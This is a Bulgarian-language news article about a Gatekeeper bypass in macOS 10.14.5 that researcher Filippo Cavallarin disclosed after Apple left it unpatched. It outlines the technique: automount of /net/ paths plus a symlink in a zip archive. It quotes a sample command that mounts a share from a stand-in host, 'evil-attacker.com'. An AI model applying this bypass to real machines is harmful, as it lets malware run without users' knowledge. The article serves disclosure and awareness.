Амая Томан Изследователят по сигурността Филипо Каваларин публикува предупреждение за грешката в macOS 10.14.5 в своя блог. Това се състои във възможността за пълно заобикаляне на мерките за сигурност на Gatekeeper. Според Каваларин той е посочил грешката на Apple още през февруари тази година, но компанията не я е коригирала в последната актуализация.
Gatekeeper е разработен от Apple и е включен в неговата настолна операционна система за първи път през 2012 г. Това е механизъм, който предотвратява стартирането на приложение без знанието и съгласието на потребителя. След като изтеглите приложение, Gatekeeper автоматично проверява неговия код, за да види дали софтуерът е правилно подписан от Apple.
Може да бъде те интересуват
В публикацията си в блога Cavallarin заявява, че Gatekeeper по подразбиране счита както външното хранилище, така и споделянията в мрежата за сигурни местоположения. Следователно всяко приложение, което се намира в тези цели, може да бъде стартирано автоматично, без да се налага да преминава през проверката на Gatekeeper. Именно тази функция може да се използва за стартиране на зловреден софтуер без знанието на потребителя.
Един аспект, който позволява неоторизиран достъп, е функцията за автоматично монтиране, която позволява на потребителите автоматично да монтират мрежов дял, просто като посочат път, започващ с "/net/". Като пример Cavallarin цитира пътя „ls /net/evil-attacker.com/sharedfolder/“, който може да накара операционната система да зареди съдържанието на папка „sharefolder“ в отдалечено местоположение, което може да бъде потенциално злонамерено.
Можете да видите как работи заплахата във видеото:
Друг фактор е фактът, че ако се сподели zip архив, съдържащ конкретна символна връзка, водеща до функцията за автоматично монтиране, той няма да бъде проверен от Gatekeeper. По този начин жертвата може лесно да изтегли злонамерения архив и да го разархивира, което позволява на атакуващия да стартира практически всеки софтуер на Mac без знанието на потребителя. Finder, който скрива определени разширения по подразбиране, също има своя дял от тази уязвимост.
Каваларин заявява в своя блог, че Apple е обърнала внимание на уязвимостта на операционната система macOS на 22 февруари тази година. Но в средата на май Apple спря да комуникира с Cavallarin, така че Cavallarin реши да направи всичко публично достояние.
Източник: FCVL
